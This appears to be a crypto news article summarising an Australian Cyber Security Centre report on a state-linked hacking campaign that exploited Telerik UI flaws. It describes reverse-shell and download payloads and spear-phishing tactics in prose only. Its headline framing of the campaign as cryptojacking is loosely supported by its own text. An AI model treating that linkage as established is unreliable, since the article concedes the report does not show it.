A recent report from the Australian Cyber Security Centre (ACSC) shows that there is a significant vulnerability that is related to the different attacks that cybercriminals are sending using cryptojacking malware.

The report highlights various tactics, techniques, and procedures (TTPs) used by the criminals to exploit their victims which mainly include Australian networks. ACSC said that a group of ‘state actors’ hacked the networks on June 19. In the reported incident, they targeted a vulnerability that is linked with the cryptojacking malware attacks.

Australia’s government is currently aware of this matter and it is responding to it accordingly. The activity by these hackers represents a highly coordinated cyber-targeting activity against several Australian institutions according to the government.

Hackers Target Australian Networks Using Cryptojacking Methods 1

Coinbase 4

The term ‘Copy-Paste Compromises’ arises from the actor’s extensive use of the web shells, proof of concept exploit code, and many other tools copied almost similarly from open source.

According to the 48-page report released on June 24, these state actors targeted four crucial vulnerabilities in Telerik UI. CVE-2019-18935 is one of the exploited vulnerabilities that recently got leveraged by the Blue Mockingbird malware band. This gang utilized the method to infect numerous systems using a Monero (XMR) mining software, XMRRig.

Vulnerabilities Normally Affected By Cryptojacking Activities

The report does not indicate whether the cybercriminals managed to install cryptojacking malware in the recent massive cyberattack. But, this vulnerability is the preferred strategy used by these criminals to install different types of crypto-mining applications within corporate networks.

The report dived deep into the CVE-2019-18935 vulnerability. It shows that vulnerability has many similarities with the ones that came up on the Blue Mockingbird’s attack. But, it does not suggest that this gang participated in the cyberattack that targeted Australia:

“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; a payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”

How They Operate

These cyber attackers show the capability of quickly leveraging public exploit proof of concepts (POCs) to target networks. They often conduct reconnaissance of target networks seeking vulnerable services and probably maintain a list of several public-facing services to rapidly target following future vulnerability releases.

Hackers Target Australian Networks Using Cryptojacking Methods 2

The criminals also show an aptitude for identifying test, development, and orphaned services that are ideally known or maintained by the targeted organizations. When the exploitation did not succeed, the ACSC has identified that the cybercriminals are utilizing different spear phishing methods. This strategy takes the shape of:

  • Emails that contain links to malicious files or even the malicious file is directly attached
  • Links to credential harvesting sites
  • Use of email tracking services that identify the email opening and lure click through events
  • Links that prompt users to grant Office 365 Oauth tokens to the actor

After gaining access, the actors used a combination of custom and open source tools to persist on and frequently interact with the victim network. Even though these tools are placed on the network, the hacker migrates to legitimate remote accesses using the stolen credentials.

The cyberattacker was identified as using compromised legitimate Australian sites as control and command servers while interacting with victim networks. In general, the command and control were done using web shells and HTTP/HTTPS traffic. The attack method renders geo-blocking ineffective and it increased legitimacy to malicious network traffic in the course of investigations.

In its research, the ACSC discovered that there was no intention by the criminals to conduct any destructive or disruptive activities inside the victim environments.

Did China’s State Actors Launch This Attack

Almost 10 Chinese hacker groups have the PlugX malware among their weapons. The groups engaged with espionage activities and allegedly have majorly strong ties with the Chinese government. PlugX was one of the malware that was identified in the ACSC report.

Many of the Australian officials are convinced that China may be behind the widespread cyberattack. They suggested this probability referring to the diplomatic challenges that have been surging between the two nations.

That attack might have happened after Australia insisted on the launch of investigations that target the origin of the COVID-19 pandemic. The investigation did not go down too well with the Chinese officials.

China referred to the investigation as a ‘discriminatory’ accusation and it responded quickly to severe trade retaliations against the Oceanic country. Nevertheless, China’s government has denied these claims of hackers.

Hackers Target Australian Networks Using Cryptojacking Methods 3
blank
About the author

Wanguba Muriuki is an Editor at Large for E-Crypto News and author of the book- "The Exploitative Intrigues of Cryptocurrency Scams Explained." He is also a passionate creator who sees every aspect of life from a written perspective. He loves Blockchain, Cryptocurrency, Technology, and Traveling. He is a widely experienced creative and technical writer. Everything and everyone is describable. The best description is written.

Related Posts

blank

E-Crypto News Executive Interviews


blank

bitcoin
Bitcoin (BTC) $ 41,603.00
ethereum
Ethereum (ETH) $ 2,463.23
tether
Tether (USDT) $ 0.998285
binance-coin
Binance Coin (BNB) $ 333.12
cardano
Cardano (ADA) $ 1.31
xrp
XRP (XRP) $ 0.752829
dogecoin
Dogecoin (DOGE) $ 0.210436
usd-coin
USD Coin (USDC) $ 0.999681
polkadot
Polkadot (DOT) $ 16.41
binance-usd
Binance USD (BUSD) $ 0.999884
USD
EUR
GBP
bitcoinBitcoin (BTC)
$ 41,603.00
ethereumEthereum (ETH)
$ 2,463.23
tetherTether (USDT)
$ 0.998285
bitcoin-cashBitcoin Cash (BCH)
$ 544.95
litecoinLitecoin (LTC)
$ 143.76
bitcoinBitcoin (BTC)
35.041,17
ethereumEthereum (ETH)
2.074,72
tetherTether (USDT)
0,840830
bitcoin-cashBitcoin Cash (BCH)
459,00
litecoinLitecoin (LTC)
121,09
bitcoinBitcoin (BTC)
29,800.02
ethereumEthereum (ETH)
1,764.40
tetherTether (USDT)
0.715067
bitcoin-cashBitcoin Cash (BCH)
390.34
litecoinLitecoin (LTC)
102.97

Automated trading with HaasBot Crypto Trading Bots

Crypto Scams

Hacks and Scam
The World’s Most Infamous Crypto Hacks and Scams
July 31, 2021
Cryptocurrency Exchanges
Cryptocurrency Exchanges and the Plague of Scams and Bans
June 29, 2021
blank
What Role Do Cryptocurrencies Play In The Era Of Ransomware Attacks?
June 9, 2021
Crypto Scams On The Rise As Market Enters Bull Cycle
Crypto Scams On The Rise As Market Enters Bull Cycle
December 22, 2020
Harpreet Singh Sahni perpetrated the Plus Gold Union Coin (PGUC) scam
Sydney Concert Promoter Harpreet Sahni Involved In $50M Crypto PGUC Scam
November 2, 2020

Blockchain/Cryptocurrency Questions and Answers

Short-Sell Cryptocurrency
How to Short-Sell Cryptocurrency: A Brief Overview
July 17, 2021
Klaytn
What Is Klaytn (KLAY) And How Does It Work?
July 16, 2021
Cryptocurrencies
Our Crypto Roundup Interview Asks- Do Cryptocurrencies Have a Future?
July 15, 2021
Solana
What Is Solana (SOL) And How Does It Work?
June 26, 2021
blank
What Is Plethori Platform And How Does It Work?
June 12, 2021


CryptoCurrencyUSDChange 1hChange 24hChange 7d
Bitcoin41,575 0.44 % 7.29 % 24.27 %
Ethereum2,456.9 0.35 % 4.99 % 16.05 %
Tether1.000 0.21 % 0.05 % 0.20 %
Binance Coin332.16 0.23 % 7.32 % 11.60 %
Cardano1.310 0.78 % 3.82 % 8.75 %
XRP0.7517 0.17 % 4.07 % 23.34 %
Dogecoin0.2095 0.70 % 4.34 % 8.18 %
USD Coin0.9992 0.13 % 0.05 % 0.16 %
Polkadot16.31 0.80 % 11.31 % 22.15 %
Binance USD0.9984 0.18 % 0.05 % 0.56 %

bitcoin
Bitcoin (BTC) $ 41,363.00
ethereum
Ethereum (ETH) $ 2,456.12
tether
Tether (USDT) $ 1.00
binance-coin
Binance Coin (BNB) $ 331.94
cardano
Cardano (ADA) $ 1.30
xrp
XRP (XRP) $ 0.745529
dogecoin
Dogecoin (DOGE) $ 0.211547
usd-coin
USD Coin (USDC) $ 0.999437
polkadot
Polkadot (DOT) $ 16.44
binance-usd
Binance USD (BUSD) $ 1.00